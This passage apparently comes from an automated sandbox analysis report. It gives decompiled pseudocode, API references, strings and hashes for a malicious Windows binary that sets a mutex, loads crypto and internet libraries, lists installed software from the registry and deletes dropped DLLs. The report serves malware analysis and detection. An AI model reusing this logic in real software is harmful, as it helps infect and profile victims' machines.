								_t247 =  *0x40e1e8; // 0x4e5cc0
								_t220 = E0040A503(_t132, _t247);
								_t268 = E0040A503(_t134, _v8);
								SetEnvironmentVariableW( *0x40e2e0, _t268);
								LocalFree(_t268);
								E00409906(_t259, _t182); // executed
								_t140 = LoadLibraryW(_v24); // executed
								_v28 = _t140;
								if(_t140 != 0) {
									E00403F9D(_t220, _t140, _t259, _t182); // executed
								}
								_t142 = LoadLibraryW(_v20); // executed
								_t269 = _t142;
								_v36 = _t269;
								if(_t269 != 0) {
									_t166 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
									_v16 = _t166;
									 *0x40e0c4(0, _t166, 0x1a, 0);
									if(E004065D8(_t269) == 0) {
										_t273 = _v16;
									} else {
										_t273 = _v16;
										E0040633E(_t273, _t182, _t269, 0); // executed
									}
									LocalFree(_t273);
								}
								E0040A7DA(_t182); // executed
								E0040ABD8(_t259, _t182); // executed
								E004055B6(_t182); // executed
								E00409BD9(_t259, _t182); // executed
								E00404F7E(_t259, _t182);
								_v12 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t259) + _t149);
								if(E00408A42(_t259,  &_v12) > 0) {
									E00408ADD(_v12, _t182); // executed
								}
								LocalFree(_v12);
								E004073C7();
								_t156 = _v36;
								if(_t156 != 0) {
									FreeLibrary(_t156); // executed
								}
								_t271 = _v20;
								DeleteFileW(_t271); // executed
								LocalFree(_t271);
								_t159 = _v28;
								if(_t159 != 0) {
									FreeLibrary(_t159); // executed
								}
								_t272 = _v24;
								DeleteFileW(_t272); // executed
								LocalFree(_t272);
								LocalFree(_t259);
								goto L38;
							} else {
								ExitProcess(0xfffffffe);
							}
							goto L21;
						}
					}
					_t182 =  *((intOrPtr*)( *0x40e13c))(_t182);
					LocalFree(_t264);
					goto L18;
				}
				_t276 = 0x40e4d8;
				while(1) {
					_push( *_t276);
					_t184 =  &_v236;
					_push(_t184);
					if( *((intOrPtr*)( *0x40e170))() != 0) {
						goto L4;
					}
					_t276 = _t276 + 4;
					if(_t276 != 0x40e4dc) {
						continue;
					}
					goto L4;
				}
				goto L4;
			}

0x0040777b
0x00407783
0x00407793
0x00407796
0x0040779b
0x004077aa
0x004077ae
0x004077d4
0x004077d9
0x004077de
0x004077df
0x004077e0
0x004077e9
0x004077f8
0x004077f8
0x004077ee
0x004077fe
0x00407805
0x00407807
0x00407807
0x00407812
0x0040781e
0x0040782a
0x00407834
0x00407837
0x0040783a
0x00407847
0x0040784f
0x00407855
0x0040785a
0x0040785d
0x00407862
0x00407865
0x00407868
0x0040786b
0x00407876
0x0040787f
0x00407882
0x00407891
0x00407894
0x00407898
0x0040789d
0x0040789f
0x004078b0
0x004078b9
0x004078be
0x004078cf
0x004078d4
0x004078f1
0x004078fa
0x004078fd
0x00407904
0x0040790b
0x00407920
0x00407922
0x00407924
0x00407927
0x00407936
0x00407938
0x00407941
0x0040794f
0x0040794f
0x0040795d
0x00407968
0x0040796b
0x0040796e
0x00407970
0x00407974
0x00000000
0x00000000
0x00407976
0x0040797e
0x00407981
0x00407981
0x0040798a
0x0040798b
0x00407991
0x00000000
0x00407993
0x004079a6
0x004079a9
0x004079b2
0x004079c9
0x004079cc
0x004079d3
0x00407c45
0x00407c48
0x00407c4f
0x00407c57
0x00407c57
0x004079de
0x004079ee
0x004079f1
0x004079f5
0x004079ff
0x00407a01
0x00407a01
0x004079fb
0x00407a15
0x00407a1e
0x00407a21
0x00407a2a
0x00407a33
0x00407a4a
0x00407a4c
0x00407a5f
0x00407a6b
0x00407a6d
0x00407a75
0x00407a7a
0x00407a82
0x00407a90
0x00407a93
0x00407a9f
0x00407aa1
0x00407aa9
0x00407aae
0x00407abe
0x00407ac1
0x00407ae4
0x00407aea
0x00407afa
0x00407b01
0x00407b0a
0x00407b11
0x00407b19
0x00407b26
0x00407b28
0x00407b2d
0x00407b33
0x00407b39
0x00407b42
0x00407b44
0x00407b46
0x00407b4b
0x00407b5a
0x00407b63
0x00407b66
0x00407b75
0x00407b8a
0x00407b77
0x00407b7a
0x00407b81
0x00407b87
0x00407b8e
0x00407b8e
0x00407b98
0x00407ba1
0x00407baa
0x00407bb3
0x00407bbc
0x00407bd6
0x00407be5
0x00407beb
0x00407beb
0x00407bf3
0x00407bfb
0x00407c00
0x00407c05
0x00407c08
0x00407c08
0x00407c0e
0x00407c12
0x00407c19
0x00407c1f
0x00407c24
0x00407c27
0x00407c27
0x00407c2d
0x00407c31
0x00407c38
0x00407c3f
0x00000000
0x00407a35
0x00407a37
0x00407a37
0x00000000
0x00407a33
0x00407991
0x0040799e
0x004079a0
0x00000000
0x004079a0
0x004077b0
0x004077b5
0x004077b5
0x004077bc
0x004077c2
0x004077c7
0x00000000
0x00000000
0x004077c9
0x004077d2
0x00000000
0x00000000
0x00000000
0x004077d2
0x00000000

APIs

Part of subcall function 0040100B: LoadLibraryW.KERNEL32(kernel32.dll,?,?,00407780), ref: 00401016
Part of subcall function 0040100B: GetProcAddress.KERNEL32(00000000,LoadLibraryW), ref: 00401036
Part of subcall function 0040100B: LoadLibraryW.KERNEL32(Shlwapi.dll,?,?,?,?,?,00407780), ref: 00401042
Part of subcall function 0040100B: LoadLibraryW.KERNEL32(Ole32.dll,?,?,?,?,?,00407780), ref: 00401051
Part of subcall function 0040100B: LoadLibraryW.KERNEL32(WinInet.dll,?,?,?,?,?,00407780), ref: 00401061
Part of subcall function 0040100B: LoadLibraryW.KERNEL32(Crypt32.dll,?,?,?,?,?,00407780), ref: 00401091
Part of subcall function 0040100B: LoadLibraryW.KERNEL32(Shell32.dll,?,?,?,?,?,00407780), ref: 004010A1
Part of subcall function 0040100B: LoadLibraryW.KERNEL32(Bcrypt.dll,?,?,?,?,?,00407780), ref: 004010AA
Part of subcall function 0040100B: GetProcAddress.KERNEL32(?,GetProcAddress), ref: 004010B8

CoInitialize.OLE32(00000000), ref: 00407783

Part of subcall function 0040A4C2: LocalAlloc.KERNEL32(00000040,?,?,?,00000000,00407793), ref: 0040A4E1
Part of subcall function 0040A4C2: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,76426c3f362f5a47a469f0e9d8bc3eef,000000FF,00000000,00000000,?,?,?,00000000,00407793), ref: 0040A4F1

CreateMutexW.KERNEL32(00000000,00000000,iqroq5112542785672901323), ref: 004077EE
ExitProcess.KERNEL32 ref: 004077F8
LocalFree.KERNEL32(00000000), ref: 004078FD
LocalFree.KERNEL32(00000000), ref: 00407904
LocalFree.KERNEL32(00000000), ref: 0040790B
LocalFree.KERNEL32(00000000), ref: 00407976
LocalFree.KERNEL32(00000000), ref: 00407981
LocalFree.KERNEL32(00000000), ref: 004079A0
LocalFree.KERNEL32(?), ref: 004079A9
LocalFree.KERNEL32(?), ref: 004079B2
ExitProcess.KERNEL32 ref: 00407A01
ExitProcess.KERNEL32 ref: 00407A37

Strings

, xrefs: 00407842
, xrefs: 00407817
`O, xrefs: 00407A7A
xYP, xrefs: 00407855
, xrefs: 00407823
, xrefs: 0040782F
iqroq5112542785672901323, xrefs: 004077D9, 004077DE, 004077EB
76426c3f362f5a47a469f0e9d8bc3eef, xrefs: 00407789

Memory Dump Source

Source File: 00000014.00000002.439745303.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.440168036.0000000000410000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_F0geI.jbxd

Yara matches

Similarity

API ID: Local$Free$LibraryLoad$ExitProcess$AddressProc$AllocByteCharCreateInitializeMultiMutexWide
String ID: $ $ $ $76426c3f362f5a47a469f0e9d8bc3eef$`O$iqroq5112542785672901323$xYP
API String ID: 1492179042-376426372
Opcode ID: a44a232601d100edc6d36baaf6ddad01d88e14460ec27d44710cd718beb1410e
Instruction ID: e92a4b87a1a530e7256a75f8bb231f7b298302859da8ec0d9ad369049daf7dae
Opcode Fuzzy Hash: a44a232601d100edc6d36baaf6ddad01d88e14460ec27d44710cd718beb1410e
Instruction Fuzzy Hash: 25D18571E00214ABDB04ABB6DE49E6E77B5AF48310B10483AF905B73D1DF78AD118B5E

Uniqueness

Uniqueness Score: -1.00%

Function 00409581 Relevance: 61.6, APIs: 30, Strings: 5, Instructions: 309
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 54%

			E00409581(void* __eflags, intOrPtr* _a4, void* _a8) {
				void* _v8;
				char* _v12;
				int _v16;
				int _v20;
				int _v24;
				int _v28;
				int _v32;
				void* _v36;
				int _v40;
				long _t81;
				long _t85;
				long _t89;
				long _t95;
				long _t98;
				long _t105;
				void* _t112;
				long _t115;
				long _t127;
				long _t134;
				long _t144;
				intOrPtr* _t157;
				int _t158;
				int _t159;
				void* _t160;
				void* _t161;
				void* _t191;
				void* _t193;
				void* _t194;
				void* _t195;
				int* _t196;
				void* _t198;

				_t157 = _a4;
				_t196 = 0;
				_v16 = 0xf003f;
				_v8 = 0;
				 *_t157 = E0040A503( *_t157, _a8);
				_t81 = RegOpenKeyExW(0x80000002, L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall", 0, 0x20119,  &_v8); // executed
				if(_t81 == 0) {
					_t158 = 0;
					_v28 = 0;
					do {
						_v32 = 0x800;
						_t191 =  *((intOrPtr*)( *0x40e044))(0x40, 0x1000);
						_v36 = _t191;
						_t85 = RegEnumKeyExW(_v8, _t158, _t191,  &_v32, _t196, _t196, _t196, _t196); // executed
						_v40 = _t85;
						if(_t85 != 0) {
							L15:
							LocalFree(_t191);
							goto L16;
						}
						_a8 = _t196;
						_t127 = RegOpenKeyExW(_v8, _t191, _t196, 0x20119,  &_a8); // executed
						if(_t127 == 0) {
							_v24 = 0x1000;
							_v20 = 0x1000;
							_t161 =  *((intOrPtr*)( *0x40e044))(0x40, 0x2000);
							_v12 =  *((intOrPtr*)( *0x40e044))(0x40, _v20 + _v20);
							_t134 = RegQueryValueExW(_a8, L"DisplayName", _t196,  &_v16, _t161,  &_v24); // executed
							if(_t134 != 0) {
								L14:
								LocalFree(_v12);
								LocalFree(_t161);
								RegCloseKey(_a8); // executed
								_t158 = _v28;
								goto L15;
							}
							_t195 =  *((intOrPtr*)( *0x40e044))(0x40, _v20 + _v24 + _v20 + _v24);
							_t144 = RegQueryValueExW(_a8, L"DisplayVersion", _t196,  &_v16, _v12,  &_v20); // executed
							if(_t144 != 0) {
								L10:
								_push(_t196);
								L11:
								_push(_t161);
								wsprintfW(_t195, L"\t%s %s\n");
								_t198 = _t198 + 0x10;
								_push(_t195);
								_push( *_a4);
								if( *((intOrPtr*)( *0x40e18c))() == 0) {
									 *_a4 = E0040A503( *_a4, _t195);
								}
								LocalFree(_t195);
								_t191 = _v36;
								goto L14;
							}
							_push(_v12);
							_push(_t161);
							if( *((intOrPtr*)( *0x40e18c))() != 0) {
								goto L10;
							}
							_push(_v12);
							goto L11;
						}
						LocalFree(_t191);
						RegCloseKey(_a8);
						L16:
						_t158 = _t158 + 1;
						_v28 = _t158;
					} while (_v40 == _t196);
					RegCloseKey(_v8);
					_v8 = _t196;
					_t89 = RegOpenKeyExW(0x80000002, L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall", _t196, 0x20019,  &_v8); // executed
					if(_t89 != 0) {
						L34:
						RegCloseKey(_v8);
						return _t196;
					}
					_t159 = _t196;
					_v24 = _t196;
					do {
						_v40 = 0x800;
						_t193 =  *((intOrPtr*)( *0x40e044))(0x40, 0x1000);
						_v36 = _t193;
						_t95 = RegEnumKeyExW(_v8, _t159, _t193,  &_v40, _t196, _t196, _t196, _t196); // executed
						_v32 = _t95;
						if(_t95 != 0) {
							L31:
							LocalFree(_t193);
							goto L32;
						}
						_a8 = _t196;
						_t98 = RegOpenKeyExW(_v8, _t193, _t196, 0x20019,  &_a8); // executed
						if(_t98 == 0) {
							_v28 = 0x1000;
							_v20 = 0x1000;
							_t160 =  *((intOrPtr*)( *0x40e044))(0x40, 0x2000);
							_v12 =  *((intOrPtr*)( *0x40e044))(0x40, _v20 + _v20);
							_t105 = RegQueryValueExW(_a8, L"DisplayName", _t196,  &_v16, _t160,  &_v28); // executed
							if(_t105 != 0) {
								L30:
								LocalFree(_v12);
								LocalFree(_t160);
								RegCloseKey(_a8); // executed
								_t159 = _v24;
								goto L31;
							}
							_t112 = LocalAlloc(0x40, _v20 + _v28 + _v20 + _v28); // executed
							_t194 = _t112;
							_t115 = RegQueryValueExW(_a8, L"DisplayVersion", _t196,  &_v16, _v12,  &_v20); // executed
							if(_t115 != 0) {
								L26:
								_push(_t196);
								L27:
								_push(_t160);
								wsprintfW(_t194, L"\t%s %s\n");
								_t198 = _t198 + 0x10;
								_push(_t194);
								_push( *_a4);
								if( *((intOrPtr*)( *0x40e18c))() == 0) {
									 *_a4 = E0040A503( *_a4, _t194);
								}
								LocalFree(_t194);
								_t193 = _v36;
								goto L30;
							}
							_push(_v12);
							_push(_t160);
							if( *((intOrPtr*)( *0x40e18c))() != 0) {
								goto L26;
							}
							_push(_v12);
							goto L27;
						}
						LocalFree(_t193);
						RegCloseKey(_a8);
						L32:
						_t159 = _t159 + 1;
						_v24 = _t159;
					} while (_v32 == _t196);
					_t196 = 1;
					goto L34;
				}
				RegCloseKey(_v8);
				return 0;
			}

0x0040958b
0x0040958f
0x00409591
0x00409598
0x004095a5
0x004095bd
0x004095c1
0x004095d3
0x004095d5
0x004095d9
0x004095e5
0x004095f4
0x004095fd
0x00409606
0x00409608
0x0040960d
0x00409737
0x00409738
0x00000000
0x00409738
0x00409627
0x0040962a
0x0040962e
0x0040964f
0x00409652
0x00409661
0x00409676
0x0040968b
0x0040968f
0x0040971b
0x0040971e
0x00409725
0x0040972e
0x00409734
0x00000000
0x00409734
0x004096ae
0x004096c4
0x004096c8
0x004096de
0x004096de
0x004096df
0x004096df
0x004096e6
0x004096ef
0x004096f7
0x004096f8
0x004096fe
0x0040970f
0x0040970f
0x00409712
0x00409718
0x00000000
0x00409718
0x004096ca
0x004096d2
0x004096d7
0x00000000
0x00000000
0x004096d9
0x00000000
0x004096d9
0x00409631
0x0040963a
0x0040973e
0x0040973e
0x0040973f
0x00409742
0x0040974e
0x0040976d
0x00409770
0x00409774
0x004098f4
0x004098f7
0x00000000
0x004098ff
0x0040977a
0x0040977c
0x0040977f
0x0040978b
0x0040979a
0x004097a3
0x004097ac
0x004097ae
0x004097b3
0x004098dd
0x004098de
0x00000000
0x004098de
0x004097cd
0x004097d0
0x004097d4
0x004097f5
0x004097f8
0x00409807
0x0040981c
0x00409831
0x00409835
0x004098c1
0x004098c4
0x004098cb
0x004098d4
0x004098da
0x00000000
0x004098da
0x0040984c
0x00409854
0x0040986a
0x0040986e
0x00409884
0x00409884
0x00409885
0x00409885
0x0040988c
0x00409895
0x0040989d
0x0040989e
0x004098a4
0x004098b5
0x004098b5
0x004098b8
0x004098be
0x00000000
0x004098be
0x00409870
0x00409878
0x0040987d
0x00000000
0x00000000
0x0040987f
0x00000000
0x0040987f
0x004097d7
0x004097e0
0x004098e4
0x004098e4
0x004098e5
0x004098e8
0x004098f3
0x00000000
0x004098f3
0x004095c6
0x00000000

APIs

Part of subcall function 0040A503: lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,?,00408633), ref: 0040A516
Part of subcall function 0040A503: lstrlenW.KERNEL32(?,?,00000000,?,00000000,00000000,?,00408633), ref: 0040A51D
Part of subcall function 0040A503: LocalAlloc.KERNEL32(00000040,00000000,?,00000000,?,00000000,00000000,?,00408633), ref: 0040A533
Part of subcall function 0040A503: GlobalFree.KERNEL32(?), ref: 0040A550

RegOpenKeyExW.KERNEL32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020119,00000000,74CB5850,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004095BD
RegCloseKey.ADVAPI32(00000000), ref: 004095C6
RegEnumKeyExW.KERNEL32(00000000,00000000,00000000,00000800,00000000,00000000,00000000,00000000), ref: 00409606
RegOpenKeyExW.KERNEL32(00000000,00000000,00000000,00020119,000F003F), ref: 0040962A
LocalFree.KERNEL32(00000000), ref: 00409631
RegCloseKey.ADVAPI32(000F003F), ref: 0040963A
RegCloseKey.ADVAPI32(00000000), ref: 0040974E
RegOpenKeyExW.KERNEL32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,00000000), ref: 00409770
RegEnumKeyExW.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 004097AC
RegOpenKeyExW.KERNEL32(00000000,00000000,00000000,00020019,000F003F), ref: 004097D0
LocalFree.KERNEL32(00000000), ref: 004097D7
RegCloseKey.ADVAPI32(000F003F), ref: 004097E0

Strings

SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 004095B3, 00409763
%s %s, xrefs: 004096E0, 00409886
DisplayName, xrefs: 00409683, 00409829
DisplayVersion, xrefs: 004096BC, 00409862
?, xrefs: 00409591

Memory Dump Source

Source File: 00000014.00000002.439745303.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.440168036.0000000000410000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_F0geI.jbxd

Yara matches

Similarity

API ID: CloseOpen$FreeLocal$Enumlstrlen$AllocGlobal
String ID: %s %s$?$DisplayName$DisplayVersion$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
API String ID: 3566135887-2725056526
Opcode ID: 4fc523157058bb90ebc2adb6a57775fece7855522a3e6395472df4a88ae19298
Instruction ID: d80988b05da4082da03304b58d54d9122d1b9f20f569912955d0e5abbda793b7
Opcode Fuzzy Hash: 4fc523157058bb90ebc2adb6a57775fece7855522a3e6395472df4a88ae19298
Instruction Fuzzy Hash: 60B16C71A00219BFDB05DFA6DD84EAF7BB9EF49340B104425FA05B7261D7749E10CB68

Uniqueness

Uniqueness Score: -1.00%

Function 004055B6 Relevance: 60.5, APIs: 48, Instructions: 476
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 38%

			E004055B6(short* __edx) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				void* _v32;
				void* _v36;
				signed int _v40;
				void* _v44;
				void* _v48;
				void* _v52;
				short* _v56;
				signed int _v60;
				char _v64;
				void* __ecx;
				void* _t117;
				void* _t124;
				void* _t131;
				void* _t138;
				void* _t147;
				void* _t156;
				void* _t162;
				void* _t167;
				void* _t181;
				void* _t194;
				void* _t195;
				void* _t209;
				void* _t210;
				void* _t211;
				void* _t212;
				void* _t213;
				void* _t214;
				void* _t226;
				void* _t228;
				void* _t229;
				void* _t230;
				char _t274;
				void* _t289;
				void* _t291;
				void* _t295;
				void* _t296;
				void* _t298;
				void* _t300;
				void* _t302;
				void* _t304;
				void* _t306;
				void* _t308;
				int _t309;
				void* _t311;
				void* _t314;
				signed int _t317;
				void* _t319;
				signed int _t321;
				void* _t323;
				signed int _t325;
				void* _t327;
				signed int _t329;
				void* _t331;
				signed int _t333;
				void* _t335;
				signed int _t337;
				void* _t339;
				signed int _t341;
				void* _t344;
				void* _t345;
				void* _t347;
				void* _t348;

				_v56 = __edx;
				_t295 =  *((intOrPtr*)( *0x40e18c))(_t230,  *0x40e250);
				if(_t295 == 0) {
					L42:
					return 0;
				}
				while(1) {
					_t296 = _t295 + 0xa;
					_t117 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t296) + _t115);
					_t226 = _t117;
					_v8 = _t226;
					_t314 =  *((intOrPtr*)( *0x40e18c))(_t296,  *0x40e1f0);
					if(_t314 == 0) {
						break;
					}
					_t317 = _t314 - _t296 >> 1;
					if(E0040A3E4(_t296,  &_v8, 0, _t317) == 0) {
						_t226 = _v8;
						break;
					}
					_t298 = _t296 + _t317 * 2 + 2;
					_t124 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t298) + _t122);
					_t226 = _t124;
					_v12 = _t226;
					_t319 =  *((intOrPtr*)( *0x40e18c))(_t298,  *0x40e20c);
					if(_t319 == 0) {
						L37:
						LocalFree(_v8);
						L29:
						break;
					}
					_t321 = _t319 - _t298 >> 1;
					if(E0040A3E4(_t298,  &_v12, 0, _t321) == 0) {
						_t226 = _v12;
						goto L37;
					}
					_t300 = _t298 + _t321 * 2 + 2;
					_t131 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t300) + _t129);
					_t226 = _t131;
					_v16 = _t226;
					_t323 =  *((intOrPtr*)( *0x40e18c))(_t300,  *0x40e20c);
					if(_t323 == 0) {
						L35:
						LocalFree(_v8);
						LocalFree(_v12);
						goto L29;
					}
					_t325 = _t323 - _t300 >> 1;
					if(E0040A3E4(_t300,  &_v16, 0, _t325) == 0) {
						_t226 = _v16;
						goto L35;
					}
					_t302 = _t300 + _t325 * 2 + 2;
					_t138 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t302) + _t136);
					_t228 = _t138;
					_v20 = _t228;
					_t327 =  *((intOrPtr*)( *0x40e18c))(_t302,  *0x40e20c);
					if(_t327 == 0) {
						L33:
						LocalFree(_v8);
						LocalFree(_v12);
						LocalFree(_t228);
						LocalFree(_v16);
						L40:
						L41:
						goto L42;
					}
					_t329 = _t327 - _t302 >> 1;
					if(E0040A3E4(_t302,  &_v20, 0, _t329) == 0) {
						_t228 = _v20;
						goto L33;
					}
					_t304 = _t302 + _t329 * 2 + 2;
					_t147 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t304) + _t145);
					_t226 = _t147;
					_v24 = _t226;
					_t331 =  *((intOrPtr*)( *0x40e18c))(_t304,  *0x40e20c);
					if(_t331 == 0) {
						L31:
						LocalFree(_v8);
						LocalFree(_v12);
						LocalFree(_v16);
						LocalFree(_v20);
						goto L29;
					}
					_t333 = _t331 - _t304 >> 1;
					if(E0040A3E4(_t304,  &_v24, 0, _t333) == 0) {
						_t226 = _v24;
						goto L31;
					}
					_t306 = _t304 + _t333 * 2 + 2;
					_t156 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t306) + _t154);
					_t226 = _t156;
					_v32 = _t226;
					_t335 =  *((intOrPtr*)( *0x40e18c))(_t306,  *0x40e20c);
					if(_t335 == 0) {
						L28:
						LocalFree(_v8);
						LocalFree(_v12);
						LocalFree(_v16);
						LocalFree(_v20);
						LocalFree(_v24);
						goto L29;
					}
					_t337 = _t335 - _t306 >> 1;
					_t162 = E0040A3E4(_t306,  &_v32, 0, _t337);
					_t226 = _v32;
					if(_t162 == 0) {
						goto L28;
					}
					_t308 = _t306 + _t337 * 2 + 2;
					_v44 =  *_t226 & 0x0000ffff;
					_t167 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t308) + _t165);
					_v28 = _t167;
					_t339 =  *((intOrPtr*)( *0x40e18c))(_t308,  *0x40e20c);
					if(_t339 == 0) {
						L27:
						LocalFree(_v8);
						LocalFree(_v12);
						LocalFree(_v16);
						LocalFree(_v24);
						LocalFree(_v20);
						LocalFree(_t226);
						LocalFree(_v28);
						goto L40;
					}
					_t341 = _t339 - _t308 >> 1;
					if(E0040A3E4(_t308,  &_v28, 0, _t341) == 0) {
						goto L27;
					}
					_t229 = _t308 + (_t341 + 1) * 2;
					_v48 =  *_v28 & 0x0000ffff;
					_push( *((intOrPtr*)( *0x40e08c))(_t229) + _t179);
					_t309 = 0x40;
					_t181 = LocalAlloc(_t309, ??);
					_push( *0x40e228);
					_t344 = _t181;
					_push(_t229);
					_v36 = _t344;
					if( *((intOrPtr*)( *0x40e18c))() == 0) {
						L26:
						LocalFree(_v8);
						LocalFree(_v12);
						LocalFree(_v16);
						LocalFree(_v24);
						LocalFree(_v20);
						LocalFree(_v32);
						LocalFree(_v28);
						LocalFree(_t344);
						goto L40;
					}
					if(E0040A3E4(_t229,  &_v36, 0, _t182 - _t229 >> 1) == 0) {
						_t344 = _v36;
						goto L26;
					}
					_v40 = _v40 & 0x00000000;
					_t194 = LocalAlloc(_t309, 0x28000); // executed
					_t345 = _t194;
					_v52 = _t345;
					_t195 =  *((intOrPtr*)( *0x40e074))(_v24);
					_push( &_v40);
					_push(_t345);
					_t289 = 0x31;
					_push(0 | _v48 == _t289);
					_push(0 | _v44 == _t289);
					_push(_t195);
					_push(_v20);
					_push(_v16);
					_push(_v12);
					E00405FEB(_v36, _v8); // executed
					_t348 = _t348 + 0x20;
					if(_v40 > 0) {
						_t209 =  *((intOrPtr*)( *0x40e044))(_t309, 0x208);
						_t210 =  *((intOrPtr*)( *0x40e044))(_t309, 0x208);
						_t291 = 0x10;
						_t211 = E0040A05F(_t209, _t291);
						_v48 = _t211;
						_t212 =  *((intOrPtr*)( *0x40e13c))(_t210,  *0x40e210);
						_t311 = _v48;
						_t213 = E0040A503(_t212, _t311);
						_t274 =  *0x40e204; // 0x4e5e00
						_v60 = _v60 & 0x00000000;
						_v64 = _t274;
						_v48 = _t213;
						_t214 = E00408619( &_v48);
						_v44 = _t214;
						_t347 =  *((intOrPtr*)( *0x40e044))(0x40, 0x184);
						 *((intOrPtr*)( *0x40e0e4))(0xfde9, 0, _t311, 0xffffffff, 0, 0, 0, 0);
						if(0 != 0) {
							 *((intOrPtr*)( *0x40e0e4))(0xfde9, 0, _t311, 0xffffffff, _t347, 0, 0, 0);
							if(0 != 0) {
								E00407EDB(_v56, _t347, 0, 0, _v40, _v52, _v44,  &_v64);
								_t348 = _t348 + 0x18;
							}
						}
						LocalFree(_t347);
						LocalFree(_v44);
						LocalFree(_v48);
						LocalFree(_t311);
						_t345 = _v52;
					}
					LocalFree(_t345); // executed
					LocalFree(_v8);
					LocalFree(_v12);
					LocalFree(_v16);
					LocalFree(_v20);
					LocalFree(_v24);
					LocalFree(_v32);
					LocalFree(_v28);
					LocalFree(_v36);
					_t295 =  *((intOrPtr*)( *0x40e18c))(_t229,  *0x40e250);
					if(_t295 != 0) {
						continue;
					} else {
						goto L41;
					}
				}
				LocalFree(_t226);
				goto L40;
			}

0x004055c8
0x004055ce
0x004055d2
0x00405b56
0x00405b5a
0x00405b5a
0x004055da
0x004055df
0x004055f0
0x004055fe
0x00405601
0x00405606
0x0040560a
0x00000000
0x00000000
0x00405615
0x00405625
0x00405b4a
0x00000000
0x00405b4a
0x00405639
0x00405644
0x00405652
0x00405655
0x0040565a
0x0040565e
0x00405b45
0x00405ae5
0x00405ae5
0x00000000
0x00405ae5
0x00405669
0x00405679
0x00405b42
0x00000000
0x00405b42
0x0040568d
0x00405698
0x004056a6
0x004056a9
0x004056ae
0x004056b2
0x00405b34
0x00405b37
0x00405ae5
0x00000000
0x00405ae5
0x004056bd
0x004056cd
0x00405b31
0x00000000
0x00405b31
0x004056e1
0x004056ec
0x004056fa
0x004056fd
0x00405702
0x00405706
0x00405b13
0x00405b16
0x00405b1f
0x00405b26
0x00405b4e
0x00405b4e
0x00405b54
0x00000000
0x00405b55
0x00405711
0x00405721
0x00405b10
0x00000000
0x00405b10
0x00405735
0x00405740
0x0040574e
0x00405751
0x00405756
0x0040575a
0x00405af0
0x00405af3
0x00405afc
0x00405b05
0x00405ae5
0x00000000
0x00405ae5
0x00405765
0x00405775
0x00405aed
0x00000000
0x00405aed
0x00405789
0x00405794
0x004057a2
0x004057a5
0x004057aa
0x004057ae
0x00405abe
0x00405ac1
0x00405aca
0x00405ad3
0x00405adc
0x00405ae5
0x00000000
0x00405ae5
0x004057b9
0x004057c0
0x004057c5
0x004057cc
0x00000000
0x00000000
0x004057de
0x004057e1
0x004057f1
0x00405800
0x00405805
0x00405809
0x00405a82
0x00405a85
0x00405a8e
0x00405a97
0x00405aa0
0x00405aa9
0x00405ab0
0x00405b4e
0x00000000
0x00405b4e
0x00405814
0x00405824
0x00000000
0x00000000
0x00405831
0x0040583a
0x00405847
0x0040584a
0x0040584c
0x0040584e
0x0040585a
0x0040585c
0x0040585d
0x00405864
0x00405a3d
0x00405a40
0x00405a49
0x00405a52
0x00405a5b
0x00405a64
0x00405a6d
0x00405a76
0x00405b4e
0x00000000
0x00405b4e
0x0040587f
0x00405a3a
0x00000000
0x00405a3a
0x0040588a
0x00405894
0x0040589f
0x004058a1
0x004058a4
0x004058a9
0x004058aa
0x004058ad
0x004058b7
0x004058c4
0x004058c8
0x004058c9
0x004058cc
0x004058cf
0x004058d2
0x004058d7
0x004058de
0x004058ef
0x004058ff
0x00405903
0x00405908
0x0040591a
0x0040591d
0x0040591f
0x00405926
0x0040592b
0x00405931
0x00405935
0x0040593b
0x0040593e
0x00405950
0x0040595b
0x0040596c
0x00405970
0x00405987
0x0040598b
0x004059a3
0x004059a8
0x004059a8
0x0040598b
0x004059ac
0x004059b5
0x004059be
0x004059c5
0x004059cb
0x004059cb
0x004059cf
0x004059d8
0x004059e1
0x004059ea
0x004059f3
0x004059fc
0x00405a05
0x00405a0e
0x00405a17
0x00405a2b
0x00405a2f
0x00000000
0x00405a35
0x00000000
0x00405a35
0x00405a2f
0x00405b4e
0x00000000

APIs

LocalAlloc.KERNEL32(00000040,00000000), ref: 004055F0
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405B4E

Part of subcall function 0040A3E4: LocalAlloc.KERNEL32(00000040,00000000,?,0040870A,00000000,00000000,?,?,?,?,?,?,004079E3), ref: 0040A40C
Part of subcall function 0040A3E4: LocalFree.KERNEL32(00000000,?,0040870A,00000000,00000000,?,?,?,?,?,?,004079E3), ref: 0040A449

LocalAlloc.KERNEL32(00000040,00000000), ref: 00405644
